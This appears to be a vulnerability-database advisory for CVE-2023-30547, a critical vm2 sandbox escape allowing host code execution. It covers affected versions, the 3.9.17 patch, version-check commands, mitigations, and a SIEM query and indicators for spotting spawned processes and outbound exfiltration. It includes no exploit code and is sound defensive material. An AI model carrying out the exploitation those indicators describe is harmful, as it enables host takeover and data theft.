Login Sign Up

CVE-2023-30547

9.8 CRITICAL
Remote Code Execution

📋 TL;DR

This vulnerability in vm2 sandbox allows attackers to escape the sandbox environment and execute arbitrary code on the host system by exploiting improper exception sanitization. It affects all applications using vm2 versions up to 3.9.16 to run untrusted JavaScript code. The impact is severe as it enables full host system compromise.

💻 Affected Systems

Products:
  • vm2
Versions: All versions up to and including 3.9.16
Operating Systems: All operating systems running Node.js
Default Config Vulnerable: ⚠️ Yes
Notes: Any application using vm2 to execute untrusted JavaScript code is vulnerable regardless of configuration.

📦 What is this software?

Vm2 by Vm2 Project

View all CVEs affecting Vm2 →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete host system takeover with attacker gaining full control over the server, allowing data theft, lateral movement, and persistent backdoor installation.

🟠

Likely Case

Remote code execution on the host system, enabling data exfiltration, cryptocurrency mining, or participation in botnets.

🟢

If Mitigated

Limited impact if vm2 is only used for isolated, non-critical operations with minimal host permissions.

🌐 Internet-Facing: HIGH
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ⚠️ Yes
Complexity: LOW

Proof-of-concept code is publicly available in GitHub gists and security advisories, making exploitation straightforward for attackers.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 3.9.17

Vendor Advisory: https://github.com/patriksimek/vm2/security/advisories/GHSA-ch3r-j5x3-6q2m

Restart Required: Yes

Instructions:

1. Update vm2 dependency to version 3.9.17 or higher. 2. Run 'npm update vm2' or 'yarn upgrade vm2'. 3. Restart all Node.js applications using vm2. 4. Test that sandbox functionality still works as expected.

🧯 If You Can't Patch

  • Isolate affected systems from network access and sensitive data
  • Replace vm2 usage with alternative sandbox solutions or remove untrusted code execution entirely

🔍 How to Verify

Check if Vulnerable:

Check package.json or run 'npm list vm2' to see installed version. If version is 3.9.16 or lower, system is vulnerable.

Check Version:

npm list vm2 | grep vm2

Verify Fix Applied:

After updating, run 'npm list vm2' to confirm version 3.9.17 or higher is installed. Test sandbox functionality with known safe scripts.

📡 Detection & Monitoring

Log Indicators:

  • Unusual process spawns from Node.js applications
  • Unexpected file system access patterns
  • Sandbox exception errors in application logs

Network Indicators:

  • Outbound connections to suspicious IPs from Node.js processes
  • Unusual data exfiltration patterns

SIEM Query:

process_name:node.exe AND (process_command_line:*vm2* OR parent_process_name:node.exe) AND (event_type:process_create OR event_type:network_connection)

📊 Metadata

CVE ID: CVE-2023-30547
CVSS v3 Score: 9.8 (CRITICAL)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE: CWE-74
Published: April 17, 2023
Last Updated: November 21, 2024

🔗 References

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2023-30547, you might also want to check these:

CVE-2026-25520 10.0

SandboxJS versions before 0.8.29 have a critical sandbox escape vulnerability that allows attackers ...

Same vulnerability type (CWE-74)
CVE-2026-25586 10.0

This CVE describes a sandbox escape vulnerability in SandboxJS library versions before 0.8.29. Attac...

Same vulnerability type (CWE-74)
CVE-2025-20281 10.0

An unauthenticated remote code execution vulnerability in Cisco ISE and ISE-PIC API allows attackers...

Same vulnerability type (CWE-74)